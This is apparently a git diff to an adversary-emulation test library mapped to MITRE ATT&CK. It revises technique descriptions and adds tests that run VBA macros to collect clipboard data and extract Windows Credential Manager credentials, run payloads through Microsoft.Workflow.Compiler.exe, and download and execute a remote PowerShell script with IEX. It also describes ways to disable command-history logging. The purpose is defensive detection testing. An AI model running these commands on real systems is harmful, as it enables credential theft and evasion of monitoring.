+ +## Atomic Test #4 - Collect Clipboard Data via VBA +This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ms_product | Maldoc application Word | String | Word| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" +``` + +#### Cleanup Commands: +```powershell +Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft #{ms_product} must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index dce7f02a..f8191383 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -37,7 +37,7 @@ atomic_tests: $(pbpaste) name: bash - name: Collect Clipboard Data via VBA - auto_generated_guid: + auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 description: | This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt supported_platforms: diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index eaace638..51d74750 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -2,9 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. -File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. - -Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)
+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. ## Atomic Tests diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index 42998236..f81368ed 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1201)
Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). -Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
+Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies) ## Atomic Tests diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md index 82a817b0..8284a94a 100644 --- a/atomics/T1218.002/T1218.002.md +++ b/atomics/T1218.002/T1218.002.md @@ -1,10 +1,12 @@ # T1218.002 - Control Panel ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/002) -
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) +
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. -For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL) +Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) -Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. + +Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
## Atomic Tests diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md index d82855fd..6fcb3da3 100644 --- a/atomics/T1218.003/T1218.003.md +++ b/atomics/T1218.003/T1218.003.md @@ -4,7 +4,7 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. -CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) +CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) ## Atomic Tests diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 256f8447..738c180b 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -14,6 +14,10 @@ - [Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File](#atomic-test-5---protocolhandlerexe-downloaded-a-suspicious-file) +- [Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution](#atomic-test-6---microsoftworkflowcompilerexe-payload-execution) + +- [Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions](#atomic-test-7---renamed-microsoftworkflowcompilerexe-payload-executions) +
@@ -214,4 +218,90 @@ write-host "Install Microsoft Word or provide correct path." +
+
+ +## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution +Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Set-Location -path PathToAtomicsFolder\T1218\src ; +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: .Net must be installed for this test to work correctly. +##### Check Prereq Commands: +```powershell +if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +write-host ".Net must be installed for this test to work correctly." +``` + + + + +
+
+ +## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions +Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| +| renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Set-Location -path PathToAtomicsFolder\T1218\src ; +#{renamed_binary} #{xml_payload} output.txt +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: .Net must be installed for this test to work correctly. +##### Check Prereq Commands: +```powershell +Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force +if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +write-host "you need to rename workflow complier before you run this test" +``` + + + +
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 5ead4c3e..1431cf7e 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -124,6 +124,7 @@ atomic_tests: command: | "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" - name: Microsoft.Workflow.Compiler.exe Payload Execution + auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e description: | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: @@ -148,6 +149,7 @@ atomic_tests: name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions + auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 description: | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 4dbeacfc..3559d65b 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -4,7 +4,7 @@ Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) -Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). +Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). ## Atomic Tests diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 79c0e9b6..c9bfec54 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -8,7 +8,7 @@ Systemd utilizes configuration files known as service units to control how servi * ExecReload directive covers when a service restarts. * ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'. -Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) +Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016) diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index 067c7d43..cb83a0d9 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -14,7 +14,7 @@ Custom databases are stored in: * %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and * hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom -To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). +To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs. diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index 03389b7d..df5c047b 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -1,10 +1,10 @@ # T1546.012 - Image File Execution Options Injection ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/012) -
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) +
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) -IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) +IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 4293ddc0..09ec8aed 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -5,26 +5,30 @@ Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce -The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) +Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index cd1a25c4..98064122 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -1,4 +1,4 @@ -# T1548.002 - Bypass User Access Control +# T1548.002 - Bypass User Account Control ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1548/002)
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md new file mode 100644 index 00000000..284b4305 --- /dev/null +++ b/atomics/T1555/T1555.md @@ -0,0 +1,55 @@ +# T1555 - Credentials from Password Stores +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555) +
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
+ +## Atomic Tests + +- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba) + + +
+ +## Atomic Test #1 - Extract Windows Credential Manager via VBA +This module will extract the credentials found within the Windows credential manager and dump +them to $env:TEMP\windows-credentials.txt + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" +``` + +#### Cleanup Commands: +```powershell +Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "word.Application" | Out-Null + Stop-Process -Name $process + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` + + + + +
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index ad1785e4..e292adfb 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -2,7 +2,7 @@ attack_technique: T1555 display_name: 'Credentials from Password Stores' atomic_tests: - name: Extract Windows Credential Manager via VBA - auto_generated_guid: + auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b description: | This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index 84bd6076..5bce4173 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -1,10 +1,12 @@ -# T1562.003 - HISTCONTROL +# T1562.003 - Impair Command History Logging ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003) -
Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. +
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. -This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. +On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. - Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
+Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. + +On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index dc142392..f647d9b2 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -1,6 +1,6 @@ # T1566.001 - Spearphishing Attachment ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1566/001) -
Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. +
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index db753b19..b84c5d66 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -4,7 +4,7 @@ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) -Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: 